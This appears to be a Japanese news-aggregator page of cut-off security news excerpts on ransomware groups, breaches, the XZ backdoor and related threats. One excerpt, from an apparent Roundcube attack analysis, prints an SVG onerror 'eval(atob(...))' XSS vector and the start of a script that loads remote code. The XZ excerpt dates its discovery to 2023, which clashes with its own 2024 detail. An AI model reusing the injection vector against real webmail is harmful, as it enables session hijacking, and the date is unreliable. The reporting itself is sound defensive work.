6月27日、KADOKAWA及びドワンゴが運営する「ニコニコ動画」が大規模サイバー攻撃をうけた件に関し、「BlackSuit(ブラック・スーツ)」を名のるハッカー集団が犯行声明を出しました。また、犯行声明の発表と同時に、盗み出した2社の社内情報を一部流出させています。 ダークウェブに出された犯行声明によると、KADOKAWAのネットワークには約1か月前に侵入したこと、そしてドワンゴ、ニコニコ、KADOKAWAなどのネットワークを暗号化し、約1.5TBのデータをダウンロードしたと主張しています。また交渉がうまく行かない場合には7月1日に、入手した情報を公開するという脅しも。 犯行声明や、ネットワークの暗号化、そしてデータの人質に、情報の一部流出。こうした手口は被害者に対してより圧力をかけるためにハッカー集団が使う手口ではあります。 しかし、「BlackSuit」の活動が最初に確認されたのは2
クラウドインフラを狙い、コインマイナーを実行することで知られるマルウェア「Kinsing」が、「Apache Tomcat」をあらたなターゲットとしていることがわかった。 「Kinsing」は、暗号資産(仮想通貨)のマイニングを行うコインマイナーの「h2miner」を実行したり、他コンテナやホストにマルウェアを拡散することでも知られるGo言語ベースのマルウェア。 これまでも、WordPress向けプラグインに判明した脆弱性「CVE-2020-25213」を悪用した攻撃や、設定ミスにより開放された「Docker」のAPIポートを狙い、悪意あるコンテナを起動するといった攻撃が確認されている。 さらには「Apache ActiveMQ」の脆弱性「CVE-2023-46604」を突く活動や、「GNU Cライブラリ(glibc)」に判明した「Looney Tunables」としても知られる権限昇格の
米当局は、ランサムウェア「Black Basta」の手口や関連する脅威情報を公開し、注意を喚起した。特に影響が大きい医療機関などへ対策を呼びかけている。 米サイバーセキュリティインフラストラクチャセキュリティ庁(CISA)や米連邦捜査局(FBI)、米保健福祉省(HHS)、MS-ISACが共同でセキュリティアドバイザリをリリースしたもの。FBIの捜査や第三者の報告によって特定された同グループの攻撃手法や関連する「IoC(Indicators of Compromise)」情報を取りまとめ、提供している。 同グループは、少なくとも2022年4月より活動しており、攻撃ツールを提供する「RaaS(Ransam as a Service)」として参加者を募り、ランサムウェアによる攻撃を展開している。 攻撃手法は、フィッシングや既知の脆弱性に対する攻撃など、広く見られる手法を用いており、初期アクセスを
Muliakaはランサムウェア攻撃を展開する新たなランサムウェアギャングとして認識されたグループの名称です。 モスクワに本拠を置くサイバーセキュリティ会社FACCTが発見しました。 ターゲットの地域 このグループの活動で現在確認されているターゲットの地域はロシアの会社です。 目的 目的は金銭です。 ランサムウェアで被害者のファイルを暗号化します。 そしてデータ復号化のために被害者に身代金を強要します。 初期アクセス 入り口は公的に利用可能なリモートアクセスサービス(RDP、VPN)や公開アプリケーションの脆弱性であることが考えられますが、詳細はまだわかっていません。 暗号化被害を受ける環境 攻撃対象となるOSは、WindowsとESXiです。 潜伏期間 このグループの活動での動きは潜伏期間が約2週間でした。 最初に侵入したタイミングから暗号化が開始されるまでに2週間の時間差がありました。
今回は、コンタクトレンズなどを製造販売する光学機器大手HOYAが被害を受けたことが判明した。 「解析には相当の日数を要する見込み」 これを受け、同社は次のような声明を出している。 <2024年3月30日未明、海外の事業所においてシステム挙動に不審な点があったことから調査をしたところ、当社グループの国内外の事業所においてシステム障害が起きていることを確認しました。当社は障害が起きたサーバーの隔離などの対応を直ちに行うとともに関係当局へ報告しました。外部の専門家を交えた調査の結果によれば、本件は第三者による当社サーバーへの不正アクセスに起因する可能性が高いとみられています。 本件により現在、複数の製品について、生産工場内のシステムや受注システムが停止しています。当社では、在庫出荷等の業務については、マニュアルで対応するなど最大限、顧客の需要にお応えするべく務めております。なお、当社が保有する機
2023年3月29日に、Linuxで広く採用されている圧縮ツール「XZ Utils」にバックドアが仕込まれていることが発覚しました。このバックドアを仕込んだ「Jia Tan」と名乗る人物の正体について、プログラマーのエバン・ボエス氏がGitHubコミットなどを追いかけて分析した結果を公開しています。 Everything I know about the XZ backdoor https://boehs.org/node/everything-i-know-about-the-xz-backdoor XZ Utilsはオープンソースで開発されており、複数人から寄せられたコードをメンテナがマージする開発形態を取っていました。XZ Utilsのメンテナは長年ラッセ・コリン氏が務めていたのですが、2022年にJia Tanがコリン氏に代わってメンテナに就任。そして2024年2月23日にJia
日本を含む欧米を中心とした法執行機関は、ランサムウェア「LockBit」への対抗措置として「Cronos作戦」を展開し、一部関係者を逮捕したほか、リークサイトのテイクダウンに成功した。攻撃グループはあらたなリークサイトを立ち上げ、今回の作戦で傷ついたRaaSブランドの回復に躍起となっている。 攻撃グループは、ダークウェブ上に設置したあらたなリークサイトを公開。そのなかの声明で「PHP」における未知の脆弱性が用いられ、テイクダウンされたなどと説明した。侵害されたのは「PHP」を実行しているサーバのみだったと主張。押収されたデータなども一部であることを強調している。 ランサムウェアの活動について追跡しているWithSecureのStephen Robinson氏は、攻撃グループのこうした動きについて、「Lockbitブランド」の評判が毀損することを抑制し、グループの強靭さをアピールすることが狙
米当局は、別名「Blackcat」としても知られるランサムウェア「ALPHV」に関するセキュリティアドバイザリを更新し、あらためて注意を呼びかけた。2023年12月中旬以降、医療ヘルスケア分野を中心に被害が拡大しているという。 「ALPHV」は、「RaaS(Ransomware as a Service)」として攻撃インフラを提供し、参加者により広範な攻撃が展開されているランサムウェア。ファイルを暗号化することにくわえ、情報を窃取して外部に公開すると脅すなど「多重脅迫」を行うことでも知られている。 米司法省が現地時間2023年12月19日に一部関連サイトを押収したことを明らかにしているが、以降も医療ヘルスケア分野を中心に被害が拡大している。 米サイバーセキュリティインフラストラクチャセキュリティ庁(CISA)、米連邦捜査局(FBI)、米保健福祉省(HHS)では、2023年12月に公開したア
■はじめに 情報窃取を伴うランサムギャングのリークサイトを観察しはじめたのは、コロナ禍と言われ始めた2020年頃でもう4年ほどが経ちました。過去には何度かその観察結果をまとめたエントリを書きました。お恥ずかしながら昨年、かまけてしまい2022年の振り返りを書くことができなかったので今年は書いてみようとふと思い立ってこれを書き始めています。(以後、出てくる数字はあくまでリークサイトの観察から自身が確認できたものですので実際の被害の件数とは異なることに注意してください) ■何を観察してきたか 観察の対象は、基本的にランサムギャングのリークサイトです。昨今のランサム攻撃は、皆さんがご存じの通りファイルやシステムのロックだけではなく、情報窃取型の脅迫や場合によっては身代金の支払いを急かすためにDDoSを行ったり、窃取した情報を元に利害関係者に連絡するというケースもあります。様々な方法で脅迫を行って
BattleRoyalは、脅威アクターです。 この脅威アクターの活動が活発化しています。 短い期間で考えると、特定の脅威アクターが使用する作戦は1つである場合が良くあるのですが、BattleRoyalは複数の作戦を短い期間に展開している動きとなっています。 TDSを使用したキャンペーン TDSはトラフィック配信システムです。 従来から、TDSはエクスプロイトキットの実行チェーンに不可欠な要素として悪用されてきました。 攻撃に気づいていないユーザーを正規のサイトでない「ランディングページ」にリダイレクトした上で、コンピューターのフィンガープリントを取得し、可能であればエクスプロイトを展開するために使用されます。 従来はエクスプロイトキットの一部としてダークウェブで販売されることが多かったのですが、状況の変化で、TDS部分を主体とした商品としてダークウェブで宣伝されるような状況になっています。
useタグのhref属性でbase64エンコードされた値を復号したところ、次のようになりました。 <svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg> href属性のx値の引数が有効なURLでないため、このオブジェクトのonerror属性が有効になります。onerror属性のペイロードを復号すると、以下のJavaScriptコード(悪意のあるURLは手動で変更しています)が得られました。このJavaScriptコードは、被害者のブラウザでRoundcubeセッションの権限で実行されます。 var fe=document.createElement('script');fe.src="https://re
「Alphv」あるいは「BlackCat」という名前で知られるランサムウェアグループが、金融機関・消費者向けのデータ企業であるMeridianLinkの顧客データと運用情報を盗み出し、身代金を要求しました。さらに、MeridianLinkがランサムウェアにデータを乗っ取られた事実を公表しなかったとして、アメリカ証券取引委員会(SEC)に苦情を申し立てました。 Ransomware Group Files SEC Complaint Over Victim's Failure to Disclose Data Breach - SecurityWeek https://www.securityweek.com/ransomware-group-files-sec-complaint-over-victims-failure-to-disclose-data-breach/ AlphV fil
2023年10月にボーイングをハッキングしたランサムウェア集団「LockBit」が、ボーイングからの身代金支払いがなかったとして約50GB分の機密データをオンラインフォーラムで公開しました。 LockBit leaks Boeing files after failed ransom negotiations • The Register https://www.theregister.com/2023/11/10/lockbit_leaks_boeing_files/ Boeing breach: LockBit leaks 50 GB of data | Cybernews https://cybernews.com/news/boeing-data-leak-lockbit-ransomware/ 2023年10月28日、航空宇宙機器開発のボーイングがLockBitにハッキングを受け
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く